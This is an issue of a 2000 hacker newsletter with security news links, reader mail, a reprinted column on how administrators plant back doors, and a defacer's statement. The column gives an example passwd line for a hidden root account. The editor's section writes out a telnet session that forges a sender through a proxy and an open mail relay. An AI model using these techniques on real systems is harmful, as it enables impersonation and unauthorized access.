| |\ | __/\ V V /\__ \ |_) | |_| | || __|__ \
|_| \_|\___| \_/\_/ |___/____/ \__, |\__\___|___/
|___/
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
Since we provide only the links in this section, be prepared
for 404's - Ed
+++ When was the last time you backed up your important data?
s
++ Phony Tragedy Site Has Virus
Contributed by Slash
Alaska Airlines warns that a Web site seeking donations for victims of
Flight 261 is a phony and that it is carrying a virus.
Full Story <http://www.ukhackers.com/04020010.htm>
++ Tough U.S. Bank Privacy Regs
Contributed by Slash
U.S. regulators took a tough line Thursday on privacy protection for
personal financial information included in a historic overhaul of
Depression-era U.S. banking laws
Full Story <http://www.ukhackers.com/0402008.htm>
++ Patch Available for the Recycle Bin Creation Vulnerability
Contributed by Slash
Microsoft has released a patch that eliminates a security vulnerability
in Windows NT 4.0. This hole allows a malicious user to create, delete or
modify files in the Recycle Bin of another user who shared the machine.
Full Story <http://www.ukhackers.com/0402009.htm>
++ Behind the Scenes at 'Hackers, Inc.'
Contributed by Slash
Professional hackers roam Net to keep companies--and data--secure.
Full Story <http://www.ukhackers.com/0402007.htm>
++ The Net�s Dark Side: Protecting Your Privacy May Empower Criminals
Contributed by Slash
Surfing the Web. You thought you knew how dangerous it could be.
But many Americans might be astonished at how easy it is to uncover
the most sensitive personal information.
Full Story <http://www.ukhackers.com/0402006.htm>
++ RSA Security's Industry-Leading Encryption Technology Offered
in OpenSite AuctionNow and OpenSite Dynamic Pricing Toolkit
Contributed by Slash
Full Story <http://www.ukhackers.com/0402005.htm>
++ Essential Security for DSL and Cable Modem Users
Contributed by Slash
Zone Labs, Inc., today announced the immediate availability of the
new ZoneAlarm 2.0 Internet security utility.
full Story <http://www.ukhackers.com/0402004.htm>
++ F-Secure, Hewlett Packard team up in WAP security
Contributed by Slash
Finnish computer security company F-Secure said on Thursday it would
develop security for Internet-enabled Wireless Application Protocol
(WAP)
full Story <http://www.ukhackers.com/0402003.htm>
++ Experts Warn of Web Surfing Risk
Contributed by Slash
Computer experts are warning of a serious new Internet security threat
that allows hackers to launch malicious programs on a victim's computer
Full Story <http://www.ukhackers.com/0402002.htm>
++ Teen Hacker's Home Raided (Business Tuesday)
http://www.wired.com/news/business/0,1367,33889,00.html?tw=wn20000126
The home of the 16-year-old hacker who launched three major lawsuits
was raided Monday in Norway, and the international hacking community is
reeling from the news. By Lynn Burke.
++ Echelon 'Proof' Discovered (Politics 3:00 a.m. PST)
http://www.wired.com/news/politics/0,1283,33891,00.html?tw=wn20000126
NSA documents refer to 'Echelon.' Is it the suspected international
citizen spying machine or the name of a legal military project? The
researcher who found them thinks it's the latter. By Chris Oakes.
++ Vodafone Gets Its Mannesmann (Business 6:00 a.m. PST)
http://www.wired.com/news/business/0,1367,34077,00.html?tw=wn20000203
The three-month-long hostile bid by Britain's telecom giant is finally
about to end ... in a friendly takeover.
++ VA Linux Snaps Up Andover (Business 6:50 a.m. PST)
http://www.wired.com/news/business/0,1367,34076,00.html?tw=wn20000203
The Linux software distributor pays an estimated $850 million in
stocks and cash for the network of tech-info sites, which includes the
esteemed Slashdot.
++ Thumbs Down on Net Wiretaps (Politics 3:00 a.m. PST)
http://www.wired.com/news/politics/0,1283,34055,00.html?tw=wn20000203
The controversy about Internet wiretaps -- which pitted the FBI and
the FCC against the ACLU and the EFF -- has ended with a recommendation
against online surveillance. Declan McCullagh reports from Washington.
++ Copy-Protected CDs Taken Back (Technology 3:00 a.m. PST)
http://www.wired.com/news/technology/0,1282,33921,00.html?tw=wn20000203
BMG Germany pulls the plug on its first effort to protect CDs from
piracy after customers complain that some of the music is unplayable.
By Chris Oakes.
++ Moveable Media: Stick or Card? (Technology 3:00 a.m. PST)
http://www.wired.com/news/technology/0,1282,34052,00.html?tw=wn20000203
A new industry consortium thinks it has the portable answer to secure
storage of music and more: a secure digital memory card. Microsoft
signed on Wednesday. Look out, Sony Memory Stick.
++ Net Tax May Get the Heave-Ho (Politics Wednesday)
http://www.wired.com/news/politics/0,1283,34075,00.html?tw=wn20000203
It's a matter of changing one sentence in existing legislation. But if
Congress approves, the threat of Internet taxation could vanish
forever. Or at least for Washington's idea of forever. Declan McCullagh
reports from Washington.
++ Class-Action Suit Calls on AOL (Politics Wednesday)
http://www.wired.com/news/politics/0,1283,34063,00.html?tw=wn20000203
A lawsuit alleges America Online's newest software disconnects users
from competing online accounts. The filing requests $8 billion in
damages for version 5.0 users.
++ RealNetworks Helps Pay Piper (Technology Wednesday)
http://www.wired.com/news/technology/0,1282,34026,00.html?tw=wn20000203
The Net's streaming media giant adds technology from AudioSoft to
facilitate royalty payments to copyright holders. The system will count
streams and send the data to the collecting agency. By Christopher
Jones.
++ Virtual Training for Real Jobs (Culture Wednesday)
http://www.wired.com/news/culture/0,1284,33897,00.html?tw=wn20000203
Technology may be the cornerstone of the new economy, but people
lacking skills are being shut out of the market. One Texas program is
trying to get them into the game. Katie Dean reports from Austin,
Texas.
++ But, How to Pronounce Dot EU? (Politics Wednesday)
http://www.wired.com/news/politics/0,1283,34045,00.html?tw=wn20000203
The European Commission, wanting a piece of the dot com pie, launches
an initiative to give businesses on the other side of the pond a
uniform suffix.
-=-
Security Portal News Shorts
-=-
++ Trend Micro Virus Alerts: TROJ_FELIZ and W97M_ARMAGID.A
<http://www.antivirus.com/vinfo/> - a Windows executable and Word macro
virus respectively, both are low risk viruses, not believed to be widespread
++ ComputerWorld: Y2K gives some admins a security education
<http://www.computerworld.com/home/print.nsf/all/000101D96E> - The threat of
online assaults had IT staffs on guard, but midnight came and went without
any serious security problems cropping up, according to experts monitoring
systems
++ ZDNet: Script virus looks to ring in new year
<http://www.zdnet.com/zdnn/stories/news/0,4586,2415783,00.html?chkpt=zdnntop
> - The first virus to get its own press release in the year 2000 appears
to be little more than a nuisance. Meanwhile, pirate-killer Trojan.Kill also
quiet
++ Jan 1, 2000
Symantec: PWSteal.Trojan Virus
<http://www.symantec.com/avcenter/venc/data/pwsteal.trojan.html> -
PWSteal.Trojan is a trojan which attempts to steal login names and
passwords. These passwords are often sent to an anonymous email address
CNN: CA warns of Y2K-triggered virus
<http://cnn.com/1999/TECH/computing/12/31/ca.virus.y2k/index.html>
- CA said the "Trojan.Kill_Inst98" virus will delete all the files
on an infected PC's C: drive when the system clock rolls over to
Jan. 1, 2000
++ Dec 31, 1999
NAI: Zelu Virus <http://vil.nai.com/vil/dos10505.asp> - This is an
MS-DOS executable which can destroy data on the hard drive. The original
filename as received to AVERT is Y2K.EXE and is 24,944 bytes in size. If
this file is run, it simulates checking the system for Y2K compliancy.
It is not however doing any such thing - it is trashing files on the
local system rendering the machine inoperable. Not believed to be
widespread.
++ CNN: CA warns of Y2K-triggered virus
<http://cnn.com/1999/TECH/computing/12/31/ca.virus.y2k/index.html>
- CA said the "Trojan.Kill_Inst98" virus will delete all the files on
an infected PC's C: drive when the system clock rolls over to Jan. 1,
2000
Y2K Status Update
<http://securityportal.com/topnews/y2k19991231-jwr-10.html> - no news is
good news
++ Sophos Virus Alert: WM97/Chantal-B
<http://www.sophos.com/virusinfo/analyses/wm97chantalb.html> -
WM97/Chantal-B is a Word macro virus which drops a batch file virus and a
Visual Basic script trojan horse. On the 31st of any month the virus
displays the Microsoft Office assistant with the message: "Y2K is Coming
Soon". If the year is 2000 the virus attempts to delete all files in the
current directory and in the root directory of the C: drive
Sophos Virus Alert: WM97/BackHand-A
<http://www.sophos.com/virusinfo/analyses/wm97backhanda.html> - If the date
is Friday the 13th the virus password protects the document with the
password "Trim(Two)". Then, if the year is 2000, it resets the computer's
date to 1/1/1980
++ CERT: Estimate of the Threat Posed by Y2K-Related Viruses
<http://www.cert.org/y2k-info/virus_threat_est.html> - About a dozen
Y2K-related viruses have been reported, but they are not widespread.
Moreover, because viruses have to be executed to operate and because most
people will not be at their keyboards as the date rolls over, the likelihood
of a significant virus event is low. As people return to work next week, the
virus risk may increase somewhat for all types of viruses, but there is no
reason to expect a major outbreak.
NAI Virus listing: ExploreZip.C or Minizip III
<http://vil.nai.com/vil/wm10493.asp> - This is another variant of the
original W32/ExploreZip.worm distributed earlier in 1999. This version is
different in that it is "localized" with Spanish error messages however will
function on English Windows systems. This edition was compressed using
another compression tool. Not currently rated as a high risk threat
++ Dec 30, 1999
ZDNet: Apple's OS 9 patch brings new problems
<http://www.zdnet.com/zdnn/stories/news/0,4586,2415488,00.html?chkpt=zdhpnew
s01> - Although many users were impressed by Apple's quick reaction this
week to the discovery of a potential security flaw in Mac OS 9, those users
who have applied the new OT Tuner 1.0 patch are reporting loss of all
network connectivity or crashes during startup. Apple says patched machines
simply need to be restarted
++ Sun Security Bulletin 192: CDE and OpenWindows
<http://securityportal.com/topnews/sun19991230-192.html> - Sun announces
the release of patches for Solaris 7, 2.6, 2.5.1, 2.5, 2.4, 2.3 (SunOS 5.7,
5.6, 5.5.1, 5.5, 5.4, 5.3), and SunOS 4.1.4, and 4.1.3_U1 which relate to
various vulnerabilities in CDE and OpenWindows
Sun Security Bulletin 191 sadmind
<http://securityportal.com/topnews/sun19991230.html> - Sun announces the
release of patches for Solaris 7, 2.6, 2.5.1, 2.5, 2.4, and 2.3 (SunOS 5.7,
5.6, 5.5.1, 5.5, 5.4 and 5.3), which relate to a vulnerability with sadmind
Thanks to myself for providing the info from my wired news feed and
others from whatever sources, Zym0t1c and also to Spikeman for sending
in past entries.... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
========================================================================
The message board is DEAD it was an experiment that failed. Perhaps
i'll revive a board when I can run some good board software on our
own host.
Don't be shy with your email, we do get mail, just not much of it
directed to other readers/the general readership. I'd really like to
see a 'readers mail' section. Send in questions on security, hacking
IDS, general tech questions or observations etc, hell we've even
printed poetry in the past when we thought it was good enough to
share.. - Ed
=======================================================================
Seen on security focus:
To: Security Jobs
Subject: Virus coder wanted
Date: Thu Jan 27 2000 00:18:44
Author: Drissel, James W.
Message-ID: <CD11F9F59C6BD3118BF5009027B0F53B0884EC@adp-exch-1.cmet.af.mil>
Computer Sciences Corporation in San Antonio, TX is looking for a good virus
coder. Applicants must be willing to work at Kelly AFB in San Antonio.
Other exploit experience is helpful.
Send Resumes/questions to james.drissel@cmet.af.mil
-=-
From: <pyr0-phreak@geeks404.com>
To: <hwa@press.usmc.net>
Sent: Wednesday, January 05, 2000 1:02 AM
Subject: Just some comments
Hello staff of HWA,
Just thought i would tell u guys that u r doin a pimp ass job and if its
alright i would like to put a link up on my webpage to this interesting and
informative site. Mail me back plez.
Pyr0-phreak@geeks404.com
www.crosswinds.net/~pyr0phreak
-=-
From: Andrew Nutter-Upham <nutterupham@earthlink.net>
To: <hwa@press.usmc.net>
Sent: Sunday, January 02, 2000 9:42 PM
Subject: about your site.
I love the newsletter, read every edition. but your site sucks. now i
don't blame you, a lot of people have problems with good site design. I do
web design as a part time job, and I'd like (just to be nice, for money of
course.) to redo the site, if that's ok with you, I could leach the site
down, but i think it'd be easier if you could just zip it up and send it to
me. if you like my revisions feel free to keep them. if not, that's ok too,
i just thought that I'd put in the offer. Think it over. thanks for listening.
-andy
It sure does suck, its getting pretty shoddy and out dated looking, a tad
ragged around the edges, i've done some minor patch-up mods to make things
better but don't have time to work on it in a major way, perhaps we can get
something going here... - Ed
-=-
From: Lascarmaster <Lascars@iquebec.com>
To: <CRUCIPHUX@DOK.ORG>
Sent: Monday, January 24, 2000 1:58 AM
Subject: [ AD! ]
Hello CRUCIPHUX,
hello from France
my site is a french hacker portal with some good links and news for
hackers ( in french i prefer the word lascar )
by the way , if you could place this ad on your next hwa.hax0r
digest, it could be very nice
try my site at http://lascars.cjb.net
______________________________________________________________
French Hackers' Portal / Le Portail Des Lascars Francophones
Links and News of interest / Liens et news pour lascars. ;-)
--------------------------------------------------------------
->->->->->->->->-> http://lascars.cjb.net <-<-<-<-<-<-<-<-<-
______________________________________________________________
Le portail des Lascars c'est http://Lascars.cjb.net
Lascarmaster mailto:Lascars@iquebec.com
______________________________________________________________________________
Si votre email etait sur iFrance vous pourriez ecouter ce message au tel !
http://www.ifrance.com : ne laissez plus vos emails loins de vous ...
gratuit sur i France : emails (20 MO, POP, FAX), Agenda, Site perso
-=-
From: Dragos Ruiu <dr@v-wave.com>
To: <cc: list omitted>
Sent: Tuesday, January 25, 2000 9:50 PM
Subject: kyxspam: IMxploits in the news
(First reported in Salon huh.?... Bay Area tunnel vision is an interesting
phenomenon. Has anyone made the definitive IM vulnerability
and exploit page yet? As in I'M owned. --dr :-)
Hack Takes Aim at AOL Clients
Wired News Report
5:30 p.m. 24.Jan.2000 PST A security breach on AOL Instant Messenger put
the privacy of AIM users at risk on Monday, according to a published
report.
The breach, first reported in Salon, allows subscribers to link new AOL
accounts to AIM names that already exist. Holes in the sign-up process
allow people to get around the password protection of the AIM accounts.
"We are aware of it and are deploying security measures to defeat it," said
Rich D'Amato, a spokesman for AOL.
AOL's online service is used to changed passwords, so hackers are easily
able to open new accounts using the existing AIM user's name.
People who subscribe to AOL are not affected by the breach. People who use
instant messaging software (AIM) outside of AOL, are.
D'Amato called the security breach an example of "hacker behavior that
crosses the line into illegal action."
"Our intention is to investigate this and when we identify an individual or
groups of individuals, we intend to bring this to the attention of the
proper law enforcement authorities," D'Amato said.
He declined to speculate on when the problem will be fixed or how many
users were affected, although he characterized it as "a very small number."
David Cassel, who edits the AOL Watch mailing list, claimed the security
hole was easily preventable. It was simply a matter of someone thinking
through the sign-on process.
"AOL left a gaping hole in the way they implemented it," Cassel wrote in an
email. "Those who happened to have an AOL account weren't vulnerable, but
everyone else was. To promote such an easily cracked software really
violates any reasonable expectation of security. In that sense, all AIM
users were affected."
"AOL is a marketing company, not a technology company," Cassel wrote.
"They mass-promoted a software that's vulnerable to easy attacks."
--
kyx.net
we're from the future - home of kanga-foo!
-=-
From: Dragos Ruiu <dr@v-wave.com> To: <cc: list omitted> Sent: Tuesday,
January 25, 2000 10:32 PM Subject: kyxspam: hacking for politics.
http://news.cnet.com/news/0-1005-200-1531134.html?tag=st.ne.ron.lthd.1005-2
00-1531134
Hackers attack Japanese government sites By Reuters Special to CNET
News.com January 25, 2000, 11:40 a.m. PT
TOKYO--Japanese officials suffered an embarrassment today when hackers
penetrated two government Web sites, leaving a message in one of them
criticizing the Japanese government's position on the 1937 Nanjing
Massacre.
Computer systems at Japan's Management and Coordination Agency were raided
yesterday, and its home page was replaced with derogatory messages
insulting the Japanese in the first-ever hacking of the country's
government computer system.
The hackers left a message on the Web site in Chinese blasting the Japanese
government for refusing to acknowledge that the Nanjing Massacre took
place, media reports said.
Jiji news agency said it had deciphered the message, which originally came
in garbled, to read: "The Chinese people must speak up to protest the
Japanese government for refusing to acknowledge the historical misdeed of
the 1937 Nanjing Massacre."
Hundreds and thousand of civilians were massacred by Imperial Army troops
during the 1937-38 occupation of the central Chinese city.
A meeting by ultrarightist Japanese in Osaka last weekend to whitewash the
incident, also called the Rape of Nanking, has whipped up new anger in
China, where hundreds marched through the streets of Nanjing to denounce
the conference.
The Chinese government lodged protests about the gathering. But the
Japanese government, which acknowledges that the incident was no
fabrication as some ultrarightists claim, failed to bar the group from
holding the weekend meeting.
A similar hacking incident occurred on Japan's Science and Technology
Agency's home page. Agency officials declined to give details of the
messages but said the home page was also replaced with a direct access
switch to adult magazine Web sites.
Top government spokesman Mikio Aoki said the government would launch an
extensive investigation into the hacking incidents, including possible help
from Washington, which is more advanced in dealing with hackers.
"The government must take all necessary measures including seeking help
from the United States," Aoki said at a news conference.
Officials said it was not immediately clear whether the same hacker was
responsible for the two separate cases of infiltration.
Story Copyright � 2000 Reuters Limited. All rights reserved.
-- kyx.net we're from the future - home of kanga-foo!
-=-
From: Dragos Ruiu <dr@v-wave.com>
To: <cc: list omitted>
Sent: Wednesday, January 26, 2000 5:15 PM
Subject: kyxspam: who watches the watchmen?
(tip o'de hat to rfp's site {wiretrip.net} that had this article link. Luv dem
skins... --dr)
http://www.sunworld.com/sunworldonline/swol-01-2000/swol-01-security.html
Who gets your trust?
Security breaches can come from those you least suspect
Summary
Systems administrators have extraordinary access to all the data on corporate
systems. What can be done to ensure that your administrators will not betray
that trust?
WIZARD'S GUIDE TO SECURITY
By Carole Fennelly
In the business world you will often hear the statement "We don't hire
hackers." When pressed for a reason, the speaker usually reveals a fear that a
"hacker" will install a back door in the system. Time and time again, however,
I have seen back doors installed by employees or security professionals whose
integrity is never questioned. When confronted, they usually say it's no big
deal. After all, they have the root password. They just wanted to set up a root
account with a different environment. That's not hacking, right? Wrong. Their
intention did not matter -- the security of the system has been bypassed.
This article discusses how administrative privileges can be abused and
suggests some methods for countering that abuse. It is not meant to imply that
every administrator abuses privileges or has malicious intent -- just that you
shouldn't assume anything.
What is a back door?
Quite simply, a back door is a method for gaining access to a system that
bypasses the usual security mechanisms. (Has everyone seen WarGames?)
Programmers and administrators love to stick back doors in so they can access
the system quickly to fix problems. Usually, they rely on obscurity to provide
security. Think of approaching a building with an elaborate security system
that does bio scans, background checks, the works. Someone who doesn't have
time to go through all that might just rig up a back exit so they can step out
for a smoke -- and then hope no one finds out about it.
In computer systems, a back door can be installed on a terminal server to
provide direct access to the console remotely, saving the administrator a trip
to the office. It can also be a program set up to invoke system privileges from
a nonprivileged account.
A simple back door is an account set up in the /etc/passwd file that looks
like any other userid. The difference is that this userid doesn't have to su to
root (and it won't show up in /var/adm/sulog) -- it already is root:
auser:x:0:101:Average User :/home/auser:/bin/ksh
If you don't see it, look again at the third field (userid) and compare it to
the root account. They are the same (0). If you are restricting direct root
logins to the console only (via /etc/default/login), then this account will
have the same limitation. The difference is that if someone does su to this
account, it will not be apparent in /var/adm/sulog that it is root. Also, a
change to the root password will not affect the account. Even if the person who
installed the account intends no harm, he or she has left a security hole.
It is also pretty common for an administrator to abuse the /.rhosts file by
putting in desktop systems "temporarily." These have a way of becoming
permanent.
Back doors can also be set up in subtler ways though SUID 0 programs (which
set the userid to root). Usually, the motivation for setting up back doors is
one of expediency. The administrator is just trying to get a job done as
quickly as possible. Problems arise later when either (1) he leaves under
normal circumstances and the hole remains or (2) he leaves under bad
circumstances and wants revenge.
Proprietary data
A manager may also be reluctant to hire "hackers" for fear that they may
divulge proprietary information or take copies of proprietary data. Several
years ago, I was consulting at a company when a new administrator joined the
group. In an effort to ingratiate himself with the team, he confided that he
had kept the backup tapes from his old job (a competitor) and that they had
some "really cool tools." It so happened that a consultant with my own business
worked at the competitor's site. A scan of the tape revealed the proprietary
software that the administrator had been working on, which eventually sold for
a significant amount of money. While the admin probably did not intend to steal
the software, his actions could have left his new employer facing a large
lawsuit -- all for the sake of a few shell scripts. In this particular case, no
one believed that the administrator had any ulterior motives. I wonder if
people would have felt that way if he had been a "known hacker"?
System monitoring
Administrators are supposed to monitor system logs. How else can problems be
investigated? But there is a difference between monitoring logs for a
legitimate reason and monitoring them to satisfy prurient curiosity. Using the
system log files to monitor a particular user's behavior for no good reason is
an abuse of privileges.
What is a good reason? Your manager asks you to monitor specific logs. Or
maybe you notice suspicious activities, in which case you should inform the
management. Or, more commonly, a user complains about a problem and you are
trying to solve it. What is a bad reason? A user ticks you off and you want to
see how he is spending company time. Or a user has a prominent position in the
company and you want to know what kinds of Websites she goes to.
Countermeasures
You can take some actions to ensure the integrity of privileged users, but
none of them carries any guarantee.
Background checks
You can have an investigative agency run a background check on an individual
and you can require drug tests. These tell you only about past behavior (if the
individual has been caught).
The state of New Jersey (where I live) has adopted a law commonly referred to
as Megan's Law (see Resources). The law mandates that a community be notified
of any convicted sex offender living in the community. On the surface, it
sounds like a great idea and a way to protect children from predators.
As a parent, I am particularly sensitive to crimes against children. I
received a Megan's Law notification this past year about a convicted sex
offender who moved into town. It did not change a thing for me. My feeling is
that every child molester has to have had a first time and that in any case not
all molesters have been identified. Therefore, I take appropriate precautions
with my children, regardless of who has moved to the area.
In the technical field, hackers are considered the molesters. (Yes, I know
all about the politically correct terms cracker, defacer, etc., but the common
term these days is hacker.) How do you know if someone is a "hacker"? Some
people try to refine the term to mean "someone who has been convicted of a
computer crime." But let's say, for example, that you attend Defcon, the
hackers' conference, and encounter an intelligent job seeker with bright blue
hair and funky clothes. Would you hire him? Chances are that you would at least
scrutinize his credentials and make sure your contract spelled out all details
of the work to be performed and the legal repercussions for any violations.
What if the same person showed up for an interview with the blue dye rinsed out
and in a nice pressed suit? Be honest: would you perform the same background
checks regardless of a person's appearance?
Technical measures
Some technical software packages can limit or control superuser privileges. I
recommend using them to prevent the inadvertent abuse of superuser privilege.
Unfortunately, knowledgeable administrators and programmers with privileged
access will be able to circumvent these measures if they really want to.
sudo
The freely available sudo package provides more granular control over the
system by restricting which privileged commands can be run on a user basis. See
Resources for the Sudo main page, which has a more complete description.
Tripwire
Tripwire is a file integrity package that, following the policy determined by
the administrator, reports any changes made to critical files. Tripwire was
originally developed at Purdue University by Gene Kim under the direction of
Eugene Spafford. I plan to evaluate the merits of the commercial version of
Tripwire in a future column. Tripwire is a good way for an administrator to
tell whether the system files or permissions have been modified.
What can be done, however, if the senior administrator who monitors the
system has malicious intent?
Professionalism
The best defense against the abuse of administrator privileges is to rely on a
certain level of professionalism. The medical Hippocratic oath includes the
mandate Do No Harm. While there is no such professional oath for systems
administrators, you can establish guidelines for acceptable behavior. During
the mid-1980s, I worked as an administrator in a computer center at a large
telecommunications research facility. We had a code of ethics that a user had
to sign before an account could be installed. We also had a code of ethics for
privileged users that included additional restrictions, such as:
No SUID 0 (set userid to root) programs will be installed without the
consent, in writing, of the senior administrator.
All users' email is to be considered private and confidential and may not be
read by anyone other than the intended recipient.
Users' files may not be modified or read except in the case of a
predetermined problem or security investigation. Be prepared to justify.
Privileged users are often entrusted with sensitive information, such as an
employee termination, before other employees. This information is to be kept
confidential.
The root passwords are changed monthly and are to be distributed by the
senior administrator only. The passwords must be kept in a safe location, such
as your wallet. If the password is lost, notify the senior administrator or
your manager immediately.
Keystroke monitoring of user activities is strictly prohibited without senior
management approval, in writing.
All administrative procedures and tools are to be considered proprietary
information and are the property of the computer center.
Tape archives may not be removed from the facility without written approval.
Discretion
A code of ethics for privileged users should not be considered a punitive
device, but rather a statement about the integrity of the person who signs it.
At one point during my years in the computer center, the secretary to the
president of the company came to me with a printer problem. As I was assisting
her, she became upset when she realized that the test job she had sent to the
printer was highly confidential. I was able to reassure her that all
administrators were bound by a code of ethics and would be terminated for
violations. (Besides, I wasn't really reading it, I was just looking for
garbage characters!) Professionals must establish a certain level of trust.
This is especially important for those privy to sensitive information regarding
terminations or investigations.
Final thoughts
Would I hire someone who showed up for an interview with blue hair, body
piercings, and a name like 3v1l HaK0rZ? No. Not because he might install a back
door, but because he was ignorant about what was acceptable on Wall Street. As
for the back doors? More are installed by well-groomed "professionals" in suits
than by "hackers." Anyone with the required skills can be either a "security
consultant" or a "hacker." The only difference is the label.
Disclaimer: The information and software in this article are provided as-is
and should be used with caution. Each environment is unique, and readers are
cautioned to investigate, with their companies, the feasibility of using the
information and software in this article. No warranties, implied or actual, are
granted for any use of the information and software in this article, and
neither the author nor the publisher is responsible for any damages, either
consequential or incidental, with respect to the use of the information and
software contained herein.
s
About the author
Carole Fennelly is a partner in Wizard's Keys Corporation, a company
specializing in computer security consulting. She has been a Unix system
administrator for almost 20 years on various platforms and of late has focused
on sendmail configurations. Carole provides security consultation to several
financial institutions in the New York City area.
--
kyx.net
we're from the future - home of kanga-foo!
-=-
02.0 From the editor.
~~~~~~~~~~~~~~~~
_____ _ _ _ _
| ____|__| (_) |_ ___ _ __( )__
| _| / _` | | __/ _ \| '__|/ __|
| |__| (_| | | || (_) | | \__ \
___|_____\__,_|_|\__\___/|_| |___/
/ ___| ___ __ _ _ __ | |__ _____ __
\___ \ / _ \ / _` | '_ \| '_ \ / _ \ \/ /
___) | (_) | (_| | |_) | |_) | (_) > <
|____/ \___/ \__,_| .__/|_.__/ \___/_/\_\
|_|
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*
* Yes we've wavered from our weekly release schedule, sorry
* about that, i've been indulging in other projects requiring
* more of my time (network IDS related etc) but you will find
* pretty much full coverage of the time period Jan 16th to Feb
* 12th or so included in this issue.
*
* I've rearranged stuff a little, i've moved some of the fodder
* that i'm sure was annoying some people and definately at
* at least one (grin) to the END of the newsletter, into the
* appendices where it should probably have been in the first
* place. So if you're looking for the gov and mil sites that
* have scoured our site or want to check the FAQ or our source
* or resource lists etc, they have all been moved to the back
* so now you can more or less 'dive in' to the news material
* and content without paging thru stuff you may have already
* seen a million times.
*
* Also did a slight modification/clean up of the website, its
* going to be redone but meanwhile i've made it a little less
* cumbersome and easier to navigate. Also added a toy or two
* want a user@hax0r-news.zzn.com mail address? I knew you did
* (heh) well now you can, just follow the link and away you
* go to yet another web based mail account...sorry appears to
* be no forwarding. <beh>
*
* This will include alot of HNN rehashed material, i'm working
* on automating the retreival of certain news sources for time
* saving in creating these issues, since we have access to
* other sources of info that don't get explored as often as
* I'd like, also keeping up with exploits is not so difficult
* now that packetstorm no longer has the contact base it once
* did. If you can suggest sites that get 0-day (grin) or current
* exploit code or the sites of the coders themselves, please
* send in the url/list info etc so we can keep everyone up to
* date.
*
* I shall finally be asking some help from people, I can no
* longer do this by myself to my satisfaction, so I hope to
* enlist some eager beavers with time to kill on this project
* rather than let release dates drift further and further
* apart.
*
*
* Things are a bit messy and not necessarily in chronological
* order, I don't like it but thats the way it turned out, I
* really need to spend more time on this to get it organized
* more neatly and make it more accessible, comments welcome.
*
* We need more submissions!, if you submit to security NG's or
* mailing lists about exploits or security concerns that you
* think may be of interest to our readers, consider CC: a copy
* to me for inclusion here. I try and cover a broad spectrum
* (perhaps too broad) of security/hacker related material and
* as such a little help with material would be most appreciated.
*
* mucho props out to Zym0t1c who is contributing more and more
* to the zine lately, thanks dude!
*
* Cruci
*
* cruciphux@dok.org
* Preffered chat method: IRC Efnet in #HWA.hax0r.news
*
*/
printf ("EoF.\n");
}
Snailmail:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
Anonymous email:
telnet (wingate ip) (see our proxies list)
Wingate>0.0.0.0
Trying 0.0.0.0...
Connected to target.host.edu
Escape character is '^]'.
220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST)
HELO bogus.com
250 target.host.edu Hello ~ereet@target.host.edu [ 0.0.0.0 ], pleased to meet you
MAIL FROM: admin@nasa.gov
250 admin@nasa.gov... Sender ok
RCPT TO: cruciphux@dok.org
250 cruciphux@dok.org... Recipient ok
DATA
Secret cool infoz
.
QUIT
If you got that far everything is probably ok, otherwise you might see
550 cruciphux@dok.org... Relaying denied
or
550 admin@nasa.gov... Domain must exist
etc.
* This won't work on a server with up to date rule sets denying relaying and your
attempts will be logged so we don't suggest you actually use this method to
reach us, its probably also illegal (theft of service) so, don't do it. ;-)
-=-
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mai*lbombs can go to /dev/nul nukes, synfloods, trinoo and tribe
or ol' papasmurfs to 127.0.0.1,
private mail to cruciphux@dok.org
danke.
C*:.
-= start =--= start =--= start =--= start =--= start =--= start =--= start
____ _ _
/ ___|___ _ __ | |_ ___ _ __ | |_
| | / _ \| '_ \| __/ _ \ '_ \| __|
| |__| (_) | | | | || __/ | | | |_
\____\___/|_| |_|\__\___|_| |_|\__|
/ ___|| |_ __ _ _ __| |_
\___ \| __/ _` | '__| __|
___) | || (_| | | | |_
|____/ \__\__,_|_| \__|
-= start =--= start =--= start =--= start =--= start =--= start =--=
03.0 Slash, Croatian cracker, speaks out
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following is from one of the last defacements that Slash has done, he
has since renounced defacing and is starting a new security group called
b0f (Buffer Overflow) we'll keep you posted as this develops. - Ed
Defaced by slash [ 2.1.2000 ] Original site here
(http://www.attrition.org/mirror/attrition/2000/01/08/www.badjura-petri.com/index-old.html)
www.badjura-petri.com - I got some interesting mail in the last few days that I
want to share with You. The first one is from a Security Consultant David Hove, who
works for a company named "RISCmanagment Inc." (www.riscman.com), and this is
what he wrote to me in his mail :
------
Numb Nuts,
Your judgments lay upon broken young souls who know no better. Let it be! Hackers
will hack regardless of holes previously exploited. If the sys adm does not fix their
holes this is not the issue. Hacking for fame is not the issue. You yourself mailed your
hack in for recognition did you not. STOP THE HYPOCRISY AND SIMPLY HACK. Who
the hell are U to dictate what should be placed on a defaced website? I personally
work the other side of the fence specializing in keeping you out but thoroughly enjoy
watching you and others like you go about your daily routine. Exploiting port 80,
buffer overflows, running your little scripts, ect. Fuck ethics! The harder you try to
hack the more aware we become as admins. For those admins who do not keep up
Fuckem!
David Hove
Security Consultant
CCSA/CCSE
RISCmanagement Inc.
www.riscman.com
-------
Deer Mr. David, your email made me very sad because I realized that people don't
get the message I'm trying to say. Hacking previously hacked sites is considered lame,
and yes, hacking for fame is the issue. Hackers now adays hack only to get media
attention. In my country a 16 year old Back Orifice user was raided for "hacking" a
computer of a Croatian politian. The media made a national hero out of him. In the
interview he said that he could hack into a bank with just two of his friends and a
good computer. Now, people who read that newspaper bought the story, but people
who know young Denis via IRC can confirm that he is a complete idiot an a lamer. His
parents are so proud of him, not knowing that anyone can "hack" using Back
Orifice.
About me mailing my hack to attrition. Yes, I did mail the hack to attrition, you
know why !? I deface to spread the message out. I personally think if I just deface
the site that people wont notice it. So I report it to attrition and they put a mirror of
the site I defaced so other people can view it too. I don't do it for the fame. I could
hack under a different name everytime, but this is my style. I don't got braging on IRC
